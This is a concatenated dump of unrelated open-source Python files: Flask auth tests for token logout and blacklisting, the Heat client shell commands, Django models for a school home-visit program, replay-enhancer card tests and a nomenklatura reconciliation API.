assert res_login.content_type == 'application/json'
assert int(res_login.status_code) == 200
# valid token logout
res = testapp.post_json(url_for('auth.logout'), headers=dict(Authorization='Bearer ' + str(data_login['auth_token'])), status="*")
data = res.json
assert data['status'] == 'success'
assert data['message'] == 'Successfully logged out.'
assert int(res.status_code) == 200
def test_invalid_logout_after_token_expires(self, user, testapp):
""" Testing logout after the token expires """
# user registration
res_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = res_register.json
assert data_register['status'] == 'success'
assert data_register['message'] == 'Successfully registered.'
assert data_register['auth_token']
assert int(res_register.status_code) == 201
# user login
res_login = testapp.post_json(url_for('auth.login'), (dict(username='duliang', email='[email protected]', password='123456')), status="*" )
data_login = res_login.json
assert data_login['status'] == 'success'
assert data_login['message'] == 'Successfully logged in.'
assert data_login['auth_token']
assert res_login.content_type == 'application/json'
assert int(res_login.status_code) == 200
# invalid token logout
time.sleep(3)
res = testapp.post_json(url_for('auth.logout'), headers=dict(Authorization='Bearer ' + str(data_login['auth_token'])), status="*")
data = res.json
assert data['status'] == 'fail'
assert data['message'] == 'Signature expired. Please log in again.'
assert int(res.status_code) == 401
def test_valid_blacklisted_token_logout(self, user, testapp):
""" Test for logout after a valid token gets blacklisted """
# user registration
res_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = res_register.json
assert data_register['status'] == 'success'
assert data_register['message'] == 'Successfully registered.'
assert data_register['auth_token']
assert int(res_register.status_code) == 201
# user login
res_login = testapp.post_json(url_for('auth.login'), (dict(username='duliang', email='[email protected]', password='123456')), status="*" )
data_login = res_login.json
assert data_login['status'] == 'success'
assert data_login['message'] == 'Successfully logged in.'
assert data_login['auth_token']
assert res_login.content_type == 'application/json'
assert int(res_login.status_code) == 200
# blacklist a valid token
BlacklistToken.create(token=data_login['auth_token'])
# blacklisted valid token logout
res = testapp.post_json(url_for('auth.logout'), headers=dict(Authorization='Bearer ' + str(data_login['auth_token'])), status="*")
data = res.json
assert data['status'] == 'fail'
assert data['message'] == 'Token blacklisted. Please log in again.'
assert int(res.status_code) == 401
def test_valid_blacklisted_token_user(self, user, testapp):
""" Test for user status with a blacklisted valid token """
# user registration
resp_register = testapp.post_json(url_for('auth.register'), (dict(username='duliang', email='[email protected]', password='123456')))
data_register = resp_register.json
# blacklist a valid token
BlacklistToken.create(token=data_register['auth_token'])
# blacklisted valid token load user
response = testapp.get(url_for('auth.status'), headers=dict(Authorization='Bearer ' + str(data_register['auth_token'])), status="*")
data = response.json
assert data['status'] == 'fail'
assert data['message'] == 'Token blacklisted. Please log in again.'
assert int(response.status_code) == 401
| bsd-3-clause | -1,567,163,010,545,778,700 | 50.450292 | 246 | 0.627643 | false |
radez/python-heatclient | heatclient/v1/shell.py | 1 | 7499 | # Copyright 2012 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import textwrap
from heatclient.common import utils
import heatclient.exc as exc
def format_parameters(params):
'''
Reformat parameters into dict of format expected by the API
'''
parameters = {}
if params:
for count, p in enumerate(params.split(';'), 1):
(n, v) = p.split('=')
parameters[n] = v
return parameters
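# Example (added, illustrative):
# format_parameters('InstanceType=m1.small;ImageId=F17-x86_64')
# -> {'InstanceType': 'm1.small', 'ImageId': 'F17-x86_64'}
# Note that values containing ';' or '=' are not supported by this split.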
def _set_template_fields(hc, args, fields):
if args.template_file:
fields['template'] = json.loads(open(args.template_file).read())
elif args.template_url:
fields['template_url'] = args.template_url
elif args.template_object:
template_body = hc.raw_request('GET', args.template_object)
if template_body:
fields['template'] = json.loads(template_body)
else:
raise exc.CommandError('Could not fetch template from %s'
% args.template_object)
else:
raise exc.CommandError('Need to specify exactly one of '
'--template-file, --template-url '
'or --template-object')
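# Added note (hedged): exactly one template source must be supplied; for
# example, an invocation along the lines of
#   heat create mystack --template-file=my_template.json \
#        -P "InstanceType=m1.large;KeyName=heat_key"
# would populate fields['template'] from the local file. The command name and
# flags above are illustrative of this shell module, not taken from its docs.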
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-c', '--create-timeout', metavar='<TIMEOUT>',
default=60, type=int,
help='Stack creation timeout in minutes. Default: 60')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values used to create the stack.')
@utils.arg('name', metavar='<STACK_NAME>',
help='Name of the stack to create.')
def do_create(hc, args):
'''Create the stack'''
fields = {'stack_name': args.name,
'timeoutmins': args.create_timeout,
'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
hc.stacks.create(**fields)
do_list(hc)
@utils.arg('id', metavar='<NAME/ID>', help='Name and ID of stack to delete.')
def do_delete(hc, args):
'''Delete the stack'''
fields = {'stack_id': args.id}
try:
hc.stacks.delete(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
do_list(hc)
@utils.arg('id', metavar='<NAME/ID>', help='Name and ID of stack to describe.')
def do_describe(hc, args):
'''Describe the stack'''
fields = {'stack_id': args.id}
try:
stack = hc.stacks.get(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
text_wrap = lambda d: '\n'.join(textwrap.wrap(d, 55))
link_format = lambda links: '\n'.join([l['href'] for l in links])
json_format = lambda js: json.dumps(js, indent=2)
formatters = {
'description': text_wrap,
'template_description': text_wrap,
'stack_status_reason': text_wrap,
'parameters': json_format,
'outputs': json_format,
'links': link_format
}
utils.print_dict(stack.to_dict(), formatters=formatters)
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values used to create the stack.')
@utils.arg('id', metavar='<NAME/ID>',
help='Name and ID of stack to update.')
def do_update(hc, args):
'''Update the stack'''
fields = {'stack_id': args.id,
'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
hc.stacks.update(**fields)
do_list(hc)
def do_list(hc, args={}):
'''List the user's stacks'''
kwargs = {}
stacks = hc.stacks.list(**kwargs)
field_labels = ['Name/ID', 'Status', 'Created']
fields = ['id', 'stack_status', 'creation_time']
formatters = {
'id': lambda row: '%s/%s' % (row.stack_name, row.id)
}
utils.print_list(stacks, fields, field_labels,
formatters=formatters, sortby=2)
@utils.arg('id', metavar='<NAME/ID>',
help='Name and ID of stack to get the template for.')
def do_gettemplate(hc, args):
'''Get the template'''
fields = {'stack_id': args.id}
try:
template = hc.stacks.template(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
print json.dumps(template, indent=2)
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values to validate.')
def do_validate(hc, args):
'''Validate a template with parameters'''
fields = {'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
validation = hc.stacks.validate(**fields)
print json.dumps(validation, indent=2)
# TODO only need to implement this once the server supports it
#@utils.arg('-u', '--template-url', metavar='<URL>',
# help='URL of template.')
#@utils.arg('-f', '--template-file', metavar='<FILE>',
# help='Path to the template.')
#def do_estimate_template_cost(hc, args):
# '''Returns the estimated monthly cost of a template'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the events for.')
#def do_event_list(hc, args):
# '''List events for a stack'''
# pass
#
#
#@utils.arg('-r', '--resource', metavar='<RESOURCE_ID>',
# help='ID of the resource to show the details for.')
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resource for.')
#def do_resource(hc, args):
# '''Describe the resource'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resources for.')
#def do_resource_list(hc, args):
# '''Show list of resources belonging to a stack'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resource details for.')
#def do_resource_list_details(hc, args):
# '''Detailed view of resources belonging to a stack'''
# pass
| apache-2.0 | 647,137,651,970,098,300 | 34.540284 | 79 | 0.604881 | false |
koebbe/homeworks | visit/models.py | 1 | 5342 | import datetime
from django.db import models
from django.contrib.auth.models import User
import json
import uuid
from qa import models as qamodels
PROGRAM_MODEL_CHOICES = (
('school_wide', '2+2'),
('fellowship', 'Fellowship Model'),
('ptlt', 'PTLT'),
)
class District(models.Model):
name = models.CharField(max_length=255, unique=True)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
class School(models.Model):
name = models.CharField(max_length=255)
district = models.ForeignKey(District, related_name='schools', blank=True, null=True)
program_model = models.CharField(max_length=20, choices=PROGRAM_MODEL_CHOICES)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
class StaffStatus(models.Model):
name = models.CharField(max_length=255, unique=True)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
verbose_name_plural = "Staff Statuses"
class ProgramDirector(models.Model):
#user = models.OneToOneField(User, null=True, blank=True)
staff = models.OneToOneField('Staff', null=True, blank=True)
schools = models.ManyToManyField(School, blank=True, related_name='programdirectors')
receive_emails = models.BooleanField(default=True)
class Meta:
ordering = ('staff', )
class SiteCoordinator(models.Model):
staff = models.OneToOneField('Staff', null=True, blank=True)
school = models.ForeignKey(School, blank=True, related_name='sitecoordinators')
class Meta:
ordering = ('staff', )
class Staff(models.Model):
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
email = models.EmailField(blank=True, null=True,)
school = models.ForeignKey(School, related_name='staff')
secondary_schools = models.ManyToManyField(School, blank=True, related_name='secondary_staff')
position = models.CharField(max_length=255, blank=True)
grade = models.CharField(max_length=255, blank=True)
#status = models.ForeignKey(StaffStatus, related_name='staff')
user = models.OneToOneField(User, null=True, blank=True)
is_visit_1_trained = models.BooleanField(default=False)
is_visit_2_trained = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
def all_visits(self):
return Visit.objects.filter(models.Q(staff1=self) | models.Q(staff2=self)) # | models.Q(staff3=self))
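        # Added comment: returns visits where this staff member took part as
        # either the primary (staff1) or secondary (staff2) visitor; staff3
        # support is commented out in the filter above.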
@property
def name(self):
return "%s %s" % (self.first_name, self.last_name)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('last_name', 'first_name')
verbose_name_plural = "Staff"
class Student(models.Model):
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
first_name = models.CharField(max_length=255, blank=True)
last_name = models.CharField(max_length=255, blank=True)
student_id = models.CharField(max_length=255)
school = models.ForeignKey(School, related_name='students')
gender = models.CharField(max_length=255, blank=True)
racial_identity = models.CharField(max_length=255, blank=True, null=True)
classroom_teachers = models.ManyToManyField(Staff, related_name='students')
grade = models.IntegerField(null=True, blank=True)
manually_added = models.BooleanField(default=False)
is_verified = models.BooleanField(default=False)
is_custom = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
@property
def name(self):
if not self.first_name and not self.last_name:
return "Student ID: %s" % (self.student_id)
else:
return "%s %s" % (self.first_name, self.last_name)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('last_name', 'first_name', 'student_id', 'school')
unique_together = ('student_id', 'school')
class Visit(models.Model):
VISIT_TYPES = (
('noshow', 'No-show'),
('complete', 'Complete'),
('contact_attempt', 'Contact Attempt')
)
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
staff1 = models.ForeignKey(Staff, related_name='visits_as_primary')
student = models.ForeignKey(Student, blank=True, null=True, related_name='visits',)
type = models.CharField(max_length=255, choices=VISIT_TYPES)
created = models.DateTimeField(auto_now_add=True)
    staff2 = models.ForeignKey(Staff, related_name='visits_as_secondary', blank=True, null=True)
date_submitted = models.DateField(blank=True, null=True)
is_submitted = models.NullBooleanField(default=False, blank=True, null=True)
answerset = models.OneToOneField(qamodels.AnswerSet)
@property
def school(self):
return self.student.school
@property
def district(self):
return self.student.school.district
def __unicode__(self):
if not self.student:
return "Unfinished visit #%d" % (self.id)
return u"%s: %s" % (self.created, self.student.name)
class Meta:
ordering = ('staff1', 'created', )
| mit | 2,329,072,173,996,672,500 | 34.852349 | 109 | 0.670348 | false |
SenorPez/project-cars-replay-enhancer | test/test_DefaultCards.py | 1 | 20152 | """
Tests DefaultCards.py
"""
import unittest
from unittest.mock import MagicMock, PropertyMock, patch, sentinel
import numpy
from PIL import ImageFont
from replayenhancer.DefaultCards \
import RaceResults, SeriesStandings, StartingGrid, SeriesChampion
class TestRaceResults(unittest.TestCase):
"""
Unit tests for Race Results card.
"""
@patch('replayenhancer.RaceData.Driver', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_no_config(self, mock_classification_entry, mock_driver):
mock_driver.laps_complete = 6
mock_driver.race_time = 42.00
mock_driver.stops = 0
mock_classification_entry.driver = mock_driver
instance = RaceResults([mock_classification_entry])
expected_result = RaceResults
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.RaceData.Driver', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_config(self, mock_classification_entry, mock_driver):
configuration = {
'participant_config': {
'Kobernulf Monnur': {
'display': 'Senor Pez',
'car': '125cc Shifter Kart',
'team': 'DarkNitro',
}
},
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
mock_driver.laps_complete = 6
mock_driver.race_time = 42.00
mock_driver.stops = 0
mock_classification_entry.driver = mock_driver
instance = RaceResults([mock_classification_entry], **configuration)
expected_result = RaceResults
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.RaceData.Driver', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_points_best_lap(self, mock_classification_entry,
mock_driver):
        driver_name = 'Kobernulf Monnur'
position = 1
best_lap = 42.0
configuration = {
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
type(mock_classification_entry).best_lap = PropertyMock(
return_value=best_lap)
mock_driver.laps_complete = 6
mock_driver.race_time = 42.00
mock_driver.stops = 0
mock_classification_entry.driver = mock_driver
instance = RaceResults([mock_classification_entry], **configuration)
expected_result = '20'
self.assertEqual(
instance.calc_points(
(driver_name, position, best_lap),
**configuration),
expected_result)
@patch('replayenhancer.RaceData.Driver', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_points_not_best_lap(self, mock_classification_entry,
mock_driver):
driver_name = 'Kobernulf Monnur'
position = 1
best_lap = 56.0
configuration = {
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
type(mock_classification_entry).best_lap = PropertyMock(
return_value=42.0)
mock_driver.laps_complete = 6
mock_driver.race_time = 42.00
mock_driver.stops = 0
mock_classification_entry.driver = mock_driver
instance = RaceResults([mock_classification_entry], **configuration)
expected_result = '15'
self.assertEqual(
instance.calc_points(
(driver_name, position, best_lap),
**configuration),
expected_result)
@patch('replayenhancer.RaceData.Driver', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_points_no_point_structure(
self, mock_classification_entry, mock_driver):
driver_name = 'Kobernulf Monnur'
position = 1
best_lap = 42.0
mock_driver.laps_complete = 6
mock_driver.race_time = 42.00
mock_driver.stops = 0
mock_classification_entry.driver = mock_driver
instance = RaceResults([mock_classification_entry])
expected_result = '0'
self.assertEqual(
instance.calc_points((driver_name, position, best_lap)),
expected_result)
def test_method_format_time_below_min(self):
time = 42
expected_result = '42.000'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_below_min_truncate(self):
time = 42.1234
expected_result = '42.123'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_below_min_round(self):
time = 42.9876
expected_result = '42.988'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_below_hour(self):
time = 84
expected_result = '1:24.000'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_below_hour_truncate(self):
time = 84.1234
expected_result = '1:24.123'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_below_hour_round(self):
time = 84.9876
expected_result = '1:24.988'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time(self):
time = 3702
expected_result = '1:01:42.000'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_truncate(self):
time = 3702.1234
expected_result = '1:01:42.123'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_round(self):
time = 3702.9876
expected_result = '1:01:42.988'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_passed_none(self):
time = None
expected_result = ""
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_passed_string(self):
time = "ERROR"
expected_result = ""
self.assertEqual(RaceResults.format_time(time), expected_result)
class TestStartingGrid(unittest.TestCase):
"""
Unit tests for Starting Grid card.
"""
@patch('replayenhancer.RaceData.StartingGridEntry', autospec=True)
def test_init_no_config(self, mock_starting_grid_entry):
instance = StartingGrid(mock_starting_grid_entry)
expected_result = StartingGrid
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.RaceData.StartingGridEntry', autospec=True)
def test_init_config(self, mock_starting_grid_entry):
configuration = {
'participant_config': {
'Kobernulf Monnur': {
'display': 'Senor Pez',
'car': '125cc Shifter Kart',
'team': 'DarkNitro',
'points': 0
}
}
}
instance = StartingGrid([mock_starting_grid_entry], **configuration)
expected_result = StartingGrid
self.assertIsInstance(instance, expected_result)
class TestSeriesStandings(unittest.TestCase):
"""
Unit Tests for Series Standings card.
"""
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_no_config(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = ('Kobernulf Monnur', 1, 42.0)
instance = SeriesStandings(mock_classification_entry)
expected_result = SeriesStandings
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_config(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = ('Kobernulf Monnur', 1, 42.0)
configuration = {
'participant_config': {
'Kobernulf Monnur': {
'display': 'Senor Pez',
'car': '125cc Shifter Kart',
'team': 'Dark Nitro',
'points': 15
}
},
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
instance = SeriesStandings([mock_classification_entry], **configuration)
expected_result = SeriesStandings
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_series_points(self, mock_classification_entry, mock_sort_data):
driver_name = 'Kobernulf Monnur'
position = 1
best_lap = 42.0
mock_sort_data.return_value = (driver_name, position, best_lap)
type(mock_classification_entry).best_lap = PropertyMock(
return_value=best_lap)
configuration = {
'points_lookup': {
'Kobernulf Monnur': 15
},
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
instance = SeriesStandings([mock_classification_entry])
expected_result = '35'
self.assertEqual(
instance.calc_series_points(
(driver_name, position, best_lap),
**configuration),
expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_series_points_no_entry(self, mock_classification_entry, mock_sort_data):
driver_name = 'Kobernulf Monnur'
position = 1
best_lap = 42.0
mock_sort_data.return_value = (driver_name, position, best_lap)
type(mock_classification_entry).best_lap = PropertyMock(
return_value=best_lap)
configuration = {
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
instance = SeriesStandings([mock_classification_entry])
expected_result = '20'
self.assertEqual(
instance.calc_series_points(
(driver_name, position, best_lap),
**configuration),
expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_series_rank_first(self, mock_classification_entry, mock_sort_data):
driver_name = 'Kobernulf Monnur'
position = 1
best_lap = 42.0
mock_sort_data.return_value = (driver_name, position, best_lap)
type(mock_classification_entry).best_lap = PropertyMock(
return_value=best_lap)
type(mock_classification_entry).calc_points_data = PropertyMock(
return_value=(driver_name, position, best_lap))
type(mock_classification_entry).driver_name = PropertyMock(
return_value=driver_name)
configuration = {
'points_lookup': {
'Kobernulf Monnur': 15
},
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
instance = SeriesStandings([mock_classification_entry])
expected_result = '1'
self.assertEqual(
instance.calc_series_rank(
(driver_name, position, best_lap),
**configuration),
expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry')
def test_method_calc_series_rank_tie_second(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = [
('First Place', 1, 42.0),
('Second Place', 2, 42.0),
('Third Place', 3, 42.0)
]
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('First Place', 1, 42.0),
driver_name='First Place')
first_place = patcher.start()
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('Second Place', 2, 42.0),
driver_name='Second Place')
second_place = patcher.start()
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('Third Place', 3, 42.0),
driver_name='Third Place')
third_place = patcher.start()
configuration = {
'points_lookup': {
'First Place': 10,
'Second Place': 5,
'Third Place': 5
},
'point_structure': [0, 10, 6, 6]
}
instance = SeriesStandings([first_place, second_place, third_place])
expected_result = '2'
self.assertEqual(
instance.calc_series_rank(
('Third Place', 3, 42.0),
**configuration),
expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry')
def test_method_calc_series_rank_third(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = [
('First Place', 1, 42.0),
('Second Place', 2, 42.0),
('Third Place', 3, 42.0)
]
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('First Place', 1, 42.0),
driver_name='First Place')
first_place = patcher.start()
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('Second Place', 2, 42.0),
driver_name='Second Place')
second_place = patcher.start()
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('Third Place', 3, 42.0),
driver_name='Third Place')
third_place = patcher.start()
configuration = {
'points_lookup': {
'First Place': 10,
'Second Place': 10,
'Third Place': 5
},
'point_structure': [0, 10, 10, 6]
}
instance = SeriesStandings([first_place, second_place, third_place])
expected_result = '3'
self.assertEqual(
instance.calc_series_rank(
('Third Place', 3, 42.0),
**configuration),
expected_result)
class TestSeriesChampion(unittest.TestCase):
"""
Unit tests for Series Champion card.
"""
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_no_config(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = ('Kobernulf Monnur', 1, 42.0)
instance = SeriesChampion([mock_classification_entry])
expected_result = SeriesChampion
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_config(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = ('Kobernulf Monnur', 1, 42.0)
configuration = {
'participant_config': {
'Kobernulf Monnur': {
'display': 'Senor Pez',
'car': '125cc Shifter Kart',
'team': 'Dark Nitro',
'points': 15
}
},
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
instance = SeriesChampion([mock_classification_entry], **configuration)
expected_result = SeriesChampion
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_to_frame_no_header(self, mock_classification_entry, mock_sort_data):
first_place = mock_classification_entry
type(first_place).calc_points_data = PropertyMock(return_value=(
'Kobernulf Monnur',
1,
42.0))
type(first_place).driver_name = PropertyMock(return_value=(
'Kobernulf Monnur'))
second_place = mock_classification_entry
type(second_place).calc_points_data = PropertyMock(
return_value=(
'Second Place',
2,
43.0))
type(second_place).driver_name = PropertyMock(return_value=(
'Second Place'))
third_place = mock_classification_entry
type(third_place).calc_points_data = PropertyMock(return_value=(
'Third Place',
3,
43.5))
type(third_place).driver_name = PropertyMock(return_value=(
'Third Place'))
mock_sort_data.return_value = [
('Kobernulf Monnur', 1, 42.0),
('Second Place', 2, 43.0),
('Third Place', 3, 43.5)]
expected_value = numpy.ndarray
instance = SeriesChampion([first_place, second_place, third_place])
self.assertIsInstance(instance.to_frame(), expected_value)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_to_frame_blank_header(self, mock_classification_entry, mock_sort_data):
first_place = mock_classification_entry
type(first_place).calc_points_data = PropertyMock(return_value=(
'Kobernulf Monnur',
1,
42.0))
type(first_place).driver_name = PropertyMock(return_value=(
'Kobernulf Monnur'))
second_place = mock_classification_entry
type(second_place).calc_points_data = PropertyMock(
return_value=(
'Second Place',
2,
43.0))
type(second_place).driver_name = PropertyMock(return_value=(
'Second Place'))
third_place = mock_classification_entry
type(third_place).calc_points_data = PropertyMock(return_value=(
'Third Place',
3,
43.5))
type(third_place).driver_name = PropertyMock(return_value=(
'Third Place'))
mock_sort_data.return_value = [
('Kobernulf Monnur', 1, 42.0),
('Second Place', 2, 43.0),
('Third Place', 3, 43.5)]
configuration = {
'heading_color': (255, 0, 0)}
expected_value = numpy.ndarray
instance = SeriesChampion([first_place, second_place, third_place], **configuration)
self.assertIsInstance(instance.to_frame(), expected_value) | mit | -6,962,500,503,765,455,000 | 36.242884 | 97 | 0.581878 | false |
robbi5/nomenklatura | nomenklatura/views/reconcile.py | 1 | 3887 | import json
from flask import Blueprint, request, url_for
from apikit import jsonify, get_limit, get_offset
from werkzeug.exceptions import BadRequest
from nomenklatura.model import Dataset, Entity
from nomenklatura.model.matching import find_matches
section = Blueprint('reconcile', __name__)
def reconcile_index(dataset):
domain = url_for('index', _external=True).strip('/')
urlp = domain + '/entities/{{id}}'
meta = {
'name': 'nomenklatura: %s' % dataset.label,
'identifierSpace': 'http://rdf.freebase.com/ns/type.object.id',
'schemaSpace': 'http://rdf.freebase.com/ns/type.object.id',
'view': {'url': urlp},
'preview': {
'url': urlp + '?preview=true',
'width': 600,
'height': 300
},
'suggest': {
'entity': {
'service_url': domain,
'service_path': '/api/2/datasets/' + dataset.name + '/suggest'
}
},
'defaultTypes': [{'name': dataset.label, 'id': '/' + dataset.name}]
}
return jsonify(meta)
def reconcile_op(dataset, query):
try:
limit = max(1, min(100, int(query.get('limit'))))
    except (TypeError, ValueError):
limit = 5
matches = find_matches(dataset, query.get('query', ''))
matches = matches.limit(limit)
results = []
for match in matches:
results.append({
'name': match['entity'].name,
'score': match['score'],
'type': [{
'id': '/' + dataset.name,
'name': dataset.label
}],
'id': match['entity'].id,
'uri': url_for('entities.view', id=match['entity'].id, _external=True),
'match': match['score']==100
})
return {
'result': results,
'num': len(results)
}
@section.route('/datasets/<dataset>/reconcile', methods=['GET', 'POST'])
def reconcile(dataset):
"""
Reconciliation API, emulates Google Refine API. See:
http://code.google.com/p/google-refine/wiki/ReconciliationServiceApi
"""
dataset = Dataset.by_name(dataset)
# TODO: Add proper support for types and namespacing.
data = request.args.copy()
data.update(request.form.copy())
if 'query' in data:
# single
q = data.get('query')
if q.startswith('{'):
try:
q = json.loads(q)
except ValueError:
raise BadRequest()
else:
q = data
return jsonify(reconcile_op(dataset, q))
elif 'queries' in data:
# multiple requests in one query
qs = data.get('queries')
try:
qs = json.loads(qs)
except ValueError:
raise BadRequest()
queries = {}
for k, q in qs.items():
queries[k] = reconcile_op(dataset, q)
return jsonify(queries)
else:
return reconcile_index(dataset)
@section.route('/datasets/<dataset>/suggest', methods=['GET', 'POST'])
def suggest(dataset):
"""
Suggest API, emulates Google Refine API. See:
http://code.google.com/p/google-refine/wiki/SuggestApi
"""
dataset = Dataset.by_name(dataset)
entities = Entity.all().filter(Entity.invalid != True) # noqa
query = request.args.get('prefix', '').strip()
entities = entities.filter(Entity.name.ilike('%s%%' % query))
entities = entities.offset(get_offset(field='start'))
entities = entities.limit(get_limit(default=20))
matches = []
for entity in entities:
matches.append({
'name': entity.name,
'n:type': {
'id': '/' + dataset.name,
'name': dataset.label
},
'id': entity.id
})
return jsonify({
"code": "/api/status/ok",
